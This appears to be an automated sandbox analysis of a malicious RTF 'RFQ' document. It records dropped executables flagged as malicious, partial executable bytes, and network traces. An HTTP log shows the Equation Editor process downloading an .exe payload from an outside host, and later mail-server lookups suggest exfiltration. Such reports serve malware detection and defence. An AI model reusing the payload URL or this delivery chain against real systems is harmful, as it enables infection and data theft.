                                                                                      SHA-512:6C4EE1B943A0DFAE8A3E300D930AEBA95C31281B820CC77CE3BD3C76D33CB7B69873F9FC3F9FAC3433E344916E2608B9A92AA73AE22F9FE2381B90DD1A967181
                                                                                      Malicious:false
                                                                                      Preview: L..................F.... ........{.......{....0../..............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....X.2.....R. .RFQ~1.DOC.@.......Q.y.Q.y*...8.....................R.F.Q. .....d.o.c.......s...............-...8...[............?J......C:\Users\..#...................\\116938\Users.user\Desktop\RFQ ..doc. .....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.R.F.Q. .....d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......116938..........D_....3N...W...9F.C...........[D_....3N...W...9F.C...........[....L..............
                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):53
                                                                                      Entropy (8bit):4.001070577720336
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:M1I/p2vcp2mX1I/p2v:M6Qco2
                                                                                      MD5:9FFEDA22630354556FE095782F293DC0
                                                                                      SHA1:AE9FF0411E9688BD099F9FC7236596E5E77ADA8E
                                                                                      SHA-256:3405891A68B8A726113FFAD75C4F092351D230B5900B1792322B404498C7BF91
                                                                                      SHA-512:2749C467A85E44F29031B19918C4ED28FD7A98DBB33F6255F61B98EB31216AA3E02D22C1A813D242FB9359DFAC5073847DDEB5566316C236BFCFF9A9D055D4B8
                                                                                      Malicious:false
                                                                                      Preview: [doc]..RFQ ..LNK=0..RFQ ..LNK=0..[doc]..RFQ ..LNK=0..
                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):162
                                                                                      Entropy (8bit):2.431160061181642
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                                                      MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                                                      SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                                                      SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                                                      SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                                                      Malicious:false
                                                                                      Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                                                                      C:\Users\user\AppData\Roaming\cAFIUeWyVQPJe.exe
                                                                                      Process:C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):733184
                                                                                      Entropy (8bit):7.923340773570457
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:XYMEBDhUzj786IMeIZfFtSyn7CY65s7/k6oHi8UiX67zeAIIHCiUzAnPAG6XecA8:XYMiGJIMBttSyW7sw6tf/cWCiuOPA9eA
                                                                                      MD5:F5F1E2A3E5DCE186EED0352350911887
                                                                                      SHA1:62F0FBF33E6E78AB4A7D7196763CC3DCE62C6A4E
                                                                                      SHA-256:8A3F4202E9F89C018F5C05B15C67898E51DC4D41AD368ABB871E044458F7822D
                                                                                      SHA-512:EFEB10F4406CFD4C553C3546A112744DBAE611CF995E243592C3047562D734B929DA2F3F34BDC029270BF2B4FA93452FAF1E70A1DE68451BC24F917A8F484018
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....s`..............P......L......>.... ... ....@.. ....................................@.....................................O.... ...H........................................................................... ............... ..H............text...D.... ...................... ..`.rsrc....H... ...J..................@..@.reloc..............................@..B................ .......H.......$}...v..........<................................................0............(....( .........(.....o!....*.....................("......(#......($......(%......(&....*N..(....o....('....*&..((....*.s)........s*........s+........s,........s-........*....0...........~....o.....+..*.0...........~....o/....+..*.0...........~....o0....+..*.0...........~....o1....+..*.0...........~....o2....+..*.0..<........~.....(3.....,!r...p.....(4...o5...s6............~.....+..*.0......
                                                                                      C:\Users\user\AppData\Roaming\rghbyjuyktyjrthbgvfsfhytrrgfsd.exe
                                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):733184
                                                                                      Entropy (8bit):7.923340773570457
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:XYMEBDhUzj786IMeIZfFtSyn7CY65s7/k6oHi8UiX67zeAIIHCiUzAnPAG6XecA8:XYMiGJIMBttSyW7sw6tf/cWCiuOPA9eA
                                                                                      MD5:F5F1E2A3E5DCE186EED0352350911887
                                                                                      SHA1:62F0FBF33E6E78AB4A7D7196763CC3DCE62C6A4E
                                                                                      SHA-256:8A3F4202E9F89C018F5C05B15C67898E51DC4D41AD368ABB871E044458F7822D
                                                                                      SHA-512:EFEB10F4406CFD4C553C3546A112744DBAE611CF995E243592C3047562D734B929DA2F3F34BDC029270BF2B4FA93452FAF1E70A1DE68451BC24F917A8F484018
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....s`..............P......L......>.... ... ....@.. ....................................@.....................................O.... ...H........................................................................... ............... ..H............text...D.... ...................... ..`.rsrc....H... ...J..................@..@.reloc..............................@..B................ .......H.......$}...v..........<................................................0............(....( .........(.....o!....*.....................("......(#......($......(%......(&....*N..(....o....('....*&..((....*.s)........s*........s+........s,........s-........*....0...........~....o.....+..*.0...........~....o/....+..*.0...........~....o0....+..*.0...........~....o1....+..*.0...........~....o2....+..*.0..<........~.....(3.....,!r...p.....(4...o5...s6............~.....+..*.0......
                                                                                      C:\Users\user\Desktop\~$RFQ ..doc
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):162
                                                                                      Entropy (8bit):2.431160061181642
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                                                      MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                                                      SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                                                      SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                                                      SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                                                      Malicious:false
                                                                                      Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:Rich Text Format data, unknown version
                                                                                      Entropy (8bit):4.00285982990663
                                                                                      TrID:
                                                                                      • Rich Text Format (5005/1) 55.56%
                                                                                      • Rich Text Format (4004/1) 44.44%
                                                                                      File name:RFQ ..doc
                                                                                      File size:762054
                                                                                      MD5:8648267830a23e39c5bc162f4ad72f85
                                                                                      SHA1:6a0436200203698fbb93170bb93ddc794d5f968e
                                                                                      SHA256:a1b7cd862762ff80cf95b544e80dfc6f887d9e0e9a8fffeec7c2574812b917d6
                                                                                      SHA512:227289ad31e31b50ebc21d2e3b1f549bf256d97df09ef1824c769d7a5f044e6c666a60fd86969f231efab948dd9c6ef37aa50b4784c0cce7f8e7870976ced828
                                                                                      SSDEEP:12288:SeYGY8R1Fk1P3o5gGJGe2mqWnMJx4+xI3I7t2nWnD8CnU6/t25opkvDA/yl9MEsR:SvGTnFw3o5gCGDpDI3IfDtl250SAA9Mx
                                                                                      File Content Preview:{\rtf978{\object15077571\objhtml\objw9484\objh7736{\*\objdata152613{\qmspace0508579802232.0508579802232\.0508579802232 \qmspace0508579802232.0508579802232\.0508579802232} \..

                                                                                      File Icon

                                                                                      Icon Hash:e4eea2aaa4b4b4a4

                                                                                      Static RTF Info

                                                                                      Objects

                                                                                       Id  Start  Format ID  Format  Classname  Datasize  Filename  Sourcepath  Temppath  Exploit
                                                                                      00000003Fhno

                                                                                      Network Behavior

                                                                                      Network Port Distribution

                                                                                      TCP Packets

                                                                                       Timestamp                             Source Port  Dest Port  Source IP     Dest IP
                                                                                       Apr 12, 2021 14:22:57.334988117 CEST  49167        80         192.168.2.22  203.167.7.88
                                                                                       Apr 12, 2021 14:22:57.463363886 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.463500023 CEST  49167        80         192.168.2.22  203.167.7.88
                                                                                       Apr 12, 2021 14:22:57.464476109 CEST  49167        80         192.168.2.22  203.167.7.88
                                                                                       Apr 12, 2021 14:22:57.592809916 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.597677946 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.597707987 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.597721100 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.597733974 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.597745895 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.597763062 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.597780943 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.597791910 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.597803116 CEST  49167        80         192.168.2.22  203.167.7.88
                                                                                       Apr 12, 2021 14:22:57.597807884 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.597837925 CEST  49167        80         192.168.2.22  203.167.7.88
                                                                                       Apr 12, 2021 14:22:57.597842932 CEST  49167        80         192.168.2.22  203.167.7.88
                                                                                       Apr 12, 2021 14:22:57.597846031 CEST  49167        80         192.168.2.22  203.167.7.88
                                                                                       Apr 12, 2021 14:22:57.597847939 CEST  49167        80         192.168.2.22  203.167.7.88
                                                                                       Apr 12, 2021 14:22:57.597851038 CEST  49167        80         192.168.2.22  203.167.7.88
                                                                                       Apr 12, 2021 14:22:57.597853899 CEST  49167        80         192.168.2.22  203.167.7.88
                                                                                       Apr 12, 2021 14:22:57.598011017 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.598129034 CEST  49167        80         192.168.2.22  203.167.7.88
                                                                                       Apr 12, 2021 14:22:57.601902008 CEST  49167        80         192.168.2.22  203.167.7.88
                                                                                       Apr 12, 2021 14:22:57.726089001 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.726129055 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.726151943 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.726178885 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.726206064 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.726233959 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.726263046 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.726296902 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.726306915 CEST  49167        80         192.168.2.22  203.167.7.88
                                                                                       Apr 12, 2021 14:22:57.726325989 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.726340055 CEST  49167        80         192.168.2.22  203.167.7.88
                                                                                       Apr 12, 2021 14:22:57.726346016 CEST  49167        80         192.168.2.22  203.167.7.88
                                                                                       Apr 12, 2021 14:22:57.726351976 CEST  49167        80         192.168.2.22  203.167.7.88
                                                                                       Apr 12, 2021 14:22:57.726356030 CEST  49167        80         192.168.2.22  203.167.7.88
                                                                                       Apr 12, 2021 14:22:57.726361036 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.726394892 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.726409912 CEST  49167        80         192.168.2.22  203.167.7.88
                                                                                       Apr 12, 2021 14:22:57.726433992 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.726469994 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.726486921 CEST  49167        80         192.168.2.22  203.167.7.88
                                                                                       Apr 12, 2021 14:22:57.726500034 CEST  49167        80         192.168.2.22  203.167.7.88
                                                                                       Apr 12, 2021 14:22:57.726504087 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.726506948 CEST  49167        80         192.168.2.22  203.167.7.88
                                                                                       Apr 12, 2021 14:22:57.726537943 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.726550102 CEST  49167        80         192.168.2.22  203.167.7.88
                                                                                       Apr 12, 2021 14:22:57.726809978 CEST  49167        80         192.168.2.22  203.167.7.88
                                                                                       Apr 12, 2021 14:22:57.727689981 CEST  49167        80         192.168.2.22  203.167.7.88
                                                                                       Apr 12, 2021 14:22:57.854878902 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.854954958 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.855034113 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.855038881 CEST  49167        80         192.168.2.22  203.167.7.88
                                                                                       Apr 12, 2021 14:22:57.855071068 CEST  49167        80         192.168.2.22  203.167.7.88
                                                                                       Apr 12, 2021 14:22:57.855098009 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.855098963 CEST  49167        80         192.168.2.22  203.167.7.88
                                                                                       Apr 12, 2021 14:22:57.855163097 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.855216980 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.855267048 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.855312109 CEST  49167        80         192.168.2.22  203.167.7.88
                                                                                       Apr 12, 2021 14:22:57.855317116 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.855325937 CEST  49167        80         192.168.2.22  203.167.7.88
                                                                                       Apr 12, 2021 14:22:57.855331898 CEST  49167        80         192.168.2.22  203.167.7.88
                                                                                       Apr 12, 2021 14:22:57.855366945 CEST  49167        80         192.168.2.22  203.167.7.88
                                                                                       Apr 12, 2021 14:22:57.855367899 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.855418921 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.855473042 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.855514050 CEST  49167        80         192.168.2.22  203.167.7.88
                                                                                       Apr 12, 2021 14:22:57.855526924 CEST  49167        80         192.168.2.22  203.167.7.88
                                                                                       Apr 12, 2021 14:22:57.855535984 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.855586052 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.855637074 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.855679989 CEST  49167        80         192.168.2.22  203.167.7.88
                                                                                       Apr 12, 2021 14:22:57.855689049 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.855729103 CEST  49167        80         192.168.2.22  203.167.7.88
                                                                                       Apr 12, 2021 14:22:57.855739117 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.855765104 CEST  49167        80         192.168.2.22  203.167.7.88
                                                                                       Apr 12, 2021 14:22:57.855776072 CEST  49167        80         192.168.2.22  203.167.7.88
                                                                                       Apr 12, 2021 14:22:57.855789900 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.855811119 CEST  49167        80         192.168.2.22  203.167.7.88
                                                                                       Apr 12, 2021 14:22:57.855819941 CEST  49167        80         192.168.2.22  203.167.7.88
                                                                                       Apr 12, 2021 14:22:57.855840921 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.855866909 CEST  49167        80         192.168.2.22  203.167.7.88
                                                                                       Apr 12, 2021 14:22:57.855896950 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.855921984 CEST  49167        80         192.168.2.22  203.167.7.88
                                                                                       Apr 12, 2021 14:22:57.855947971 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.855999947 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.856031895 CEST  49167        80         192.168.2.22  203.167.7.88
                                                                                       Apr 12, 2021 14:22:57.856051922 CEST  49167        80         192.168.2.22  203.167.7.88
                                                                                       Apr 12, 2021 14:22:57.856057882 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.856101036 CEST  49167        80         192.168.2.22  203.167.7.88
                                                                                       Apr 12, 2021 14:22:57.856153965 CEST  49167        80         192.168.2.22  203.167.7.88
                                                                                       Apr 12, 2021 14:22:57.856704950 CEST  49167        80         192.168.2.22  203.167.7.88
                                                                                       Apr 12, 2021 14:22:57.986711979 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.986767054 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.986800909 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.986825943 CEST  80           49167      203.167.7.88  192.168.2.22
                                                                                       Apr 12, 2021 14:22:57.986860991 CEST  80           49167      203.167.7.88  192.168.2.22

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 12, 2021 14:22:57.255395889 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8
Apr 12, 2021 14:22:57.312652111 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22
Apr 12, 2021 14:23:37.622607946 CEST | 53099 | 53 | 192.168.2.22 | 8.8.8.8
Apr 12, 2021 14:23:37.679516077 CEST | 53 | 53099 | 8.8.8.8 | 192.168.2.22
Apr 12, 2021 14:23:45.254225969 CEST | 52838 | 53 | 192.168.2.22 | 8.8.8.8
Apr 12, 2021 14:23:45.314045906 CEST | 53 | 52838 | 8.8.8.8 | 192.168.2.22
Apr 12, 2021 14:23:45.315026045 CEST | 52838 | 53 | 192.168.2.22 | 8.8.8.8
Apr 12, 2021 14:23:45.374996901 CEST | 53 | 52838 | 8.8.8.8 | 192.168.2.22
Apr 12, 2021 14:23:47.177695990 CEST | 61200 | 53 | 192.168.2.22 | 8.8.8.8
Apr 12, 2021 14:23:47.236190081 CEST | 53 | 61200 | 8.8.8.8 | 192.168.2.22
Apr 12, 2021 14:23:47.380472898 CEST | 49548 | 53 | 192.168.2.22 | 8.8.8.8
Apr 12, 2021 14:23:47.443227053 CEST | 53 | 49548 | 8.8.8.8 | 192.168.2.22
Apr 12, 2021 14:23:54.333218098 CEST | 55627 | 53 | 192.168.2.22 | 8.8.8.8
Apr 12, 2021 14:23:54.395222902 CEST | 53 | 55627 | 8.8.8.8 | 192.168.2.22
Apr 12, 2021 14:23:54.395848036 CEST | 55627 | 53 | 192.168.2.22 | 8.8.8.8
Apr 12, 2021 14:23:54.455004930 CEST | 53 | 55627 | 8.8.8.8 | 192.168.2.22
Apr 12, 2021 14:24:05.344419003 CEST | 56009 | 53 | 192.168.2.22 | 8.8.8.8
Apr 12, 2021 14:24:05.401247978 CEST | 53 | 56009 | 8.8.8.8 | 192.168.2.22
Apr 12, 2021 14:24:11.487760067 CEST | 61865 | 53 | 192.168.2.22 | 8.8.8.8
Apr 12, 2021 14:24:11.545258999 CEST | 53 | 61865 | 8.8.8.8 | 192.168.2.22
Apr 12, 2021 14:24:11.545697927 CEST | 61865 | 53 | 192.168.2.22 | 8.8.8.8
Apr 12, 2021 14:24:11.603570938 CEST | 53 | 61865 | 8.8.8.8 | 192.168.2.22

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Apr 12, 2021 14:22:57.255395889 CEST | 192.168.2.22 | 8.8.8.8 | 0xc6cc | Standard query (0) | rotronics.com.ph | A (IP address) | IN (0x0001)
Apr 12, 2021 14:23:37.622607946 CEST | 192.168.2.22 | 8.8.8.8 | 0xd799 | Standard query (0) | mail.privateemail.com | A (IP address) | IN (0x0001)
Apr 12, 2021 14:23:45.254225969 CEST | 192.168.2.22 | 8.8.8.8 | 0xbb0e | Standard query (0) | mail.privateemail.com | A (IP address) | IN (0x0001)
Apr 12, 2021 14:23:45.315026045 CEST | 192.168.2.22 | 8.8.8.8 | 0xbb0e | Standard query (0) | mail.privateemail.com | A (IP address) | IN (0x0001)
Apr 12, 2021 14:23:54.333218098 CEST | 192.168.2.22 | 8.8.8.8 | 0x44d7 | Standard query (0) | mail.privateemail.com | A (IP address) | IN (0x0001)
Apr 12, 2021 14:23:54.395848036 CEST | 192.168.2.22 | 8.8.8.8 | 0x44d7 | Standard query (0) | mail.privateemail.com | A (IP address) | IN (0x0001)
Apr 12, 2021 14:24:05.344419003 CEST | 192.168.2.22 | 8.8.8.8 | 0x8f63 | Standard query (0) | mail.privateemail.com | A (IP address) | IN (0x0001)
Apr 12, 2021 14:24:11.487760067 CEST | 192.168.2.22 | 8.8.8.8 | 0x450d | Standard query (0) | mail.privateemail.com | A (IP address) | IN (0x0001)
Apr 12, 2021 14:24:11.545697927 CEST | 192.168.2.22 | 8.8.8.8 | 0x450d | Standard query (0) | mail.privateemail.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Apr 12, 2021 14:22:57.312652111 CEST | 8.8.8.8 | 192.168.2.22 | 0xc6cc | No error (0) | rotronics.com.ph | - | 203.167.7.88 | A (IP address) | IN (0x0001)
Apr 12, 2021 14:23:37.679516077 CEST | 8.8.8.8 | 192.168.2.22 | 0xd799 | No error (0) | mail.privateemail.com | - | 198.54.122.60 | A (IP address) | IN (0x0001)
Apr 12, 2021 14:23:45.314045906 CEST | 8.8.8.8 | 192.168.2.22 | 0xbb0e | No error (0) | mail.privateemail.com | - | 198.54.122.60 | A (IP address) | IN (0x0001)
Apr 12, 2021 14:23:45.374996901 CEST | 8.8.8.8 | 192.168.2.22 | 0xbb0e | No error (0) | mail.privateemail.com | - | 198.54.122.60 | A (IP address) | IN (0x0001)
Apr 12, 2021 14:23:54.395222902 CEST | 8.8.8.8 | 192.168.2.22 | 0x44d7 | No error (0) | mail.privateemail.com | - | 198.54.122.60 | A (IP address) | IN (0x0001)
Apr 12, 2021 14:23:54.455004930 CEST | 8.8.8.8 | 192.168.2.22 | 0x44d7 | No error (0) | mail.privateemail.com | - | 198.54.122.60 | A (IP address) | IN (0x0001)
Apr 12, 2021 14:24:05.401247978 CEST | 8.8.8.8 | 192.168.2.22 | 0x8f63 | No error (0) | mail.privateemail.com | - | 198.54.122.60 | A (IP address) | IN (0x0001)
Apr 12, 2021 14:24:11.545258999 CEST | 8.8.8.8 | 192.168.2.22 | 0x450d | No error (0) | mail.privateemail.com | - | 198.54.122.60 | A (IP address) | IN (0x0001)
Apr 12, 2021 14:24:11.603570938 CEST | 8.8.8.8 | 192.168.2.22 | 0x450d | No error (0) | mail.privateemail.com | - | 198.54.122.60 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• rotronics.com.ph

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49167 | 203.167.7.88 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp | kBytes transferred | Direction | Data
Apr 12, 2021 14:22:57.464476109 CEST | 0 | OUT | GET /docxxx/dec/ZhIOjFmINIXbKXm.exe HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: rotronics.com.ph
    Connection: Keep-Alive
Apr 12, 2021 14:22:57.597677946 CEST | 2 | IN | HTTP/1.1 200 OK
    Date: Mon, 12 Apr 2021 12:22:58 GMT
    Server: Apache
    Last-Modified: Mon, 12 Apr 2021 05:14:50 GMT
    Accept-Ranges: bytes
    Content-Length: 733184
    Vary: User-Agent
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: application/x-msdownload
                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 aa d6 73 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 e2 0a 00 00 4c 00 00 00 00 00 00 3e 00 0b 00 00 20 00 00 00 20 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ec ff 0a 00 4f 00 00 00 00 20 0b 00 e8 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 e0 0a 00 00 20 00 00 00 e2 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e8 48 00 00 00 20 0b 00 00 4a 00 00 00 e4 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 0b 00 00 02 00 00 00 2e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 24 7d 00 00 18 76 00 00 03 00 00 00 01 00 00 06 3c f3 00 00 b0 0c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 1f 00 00 0a 28 20 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 21 00 00 0a 00 
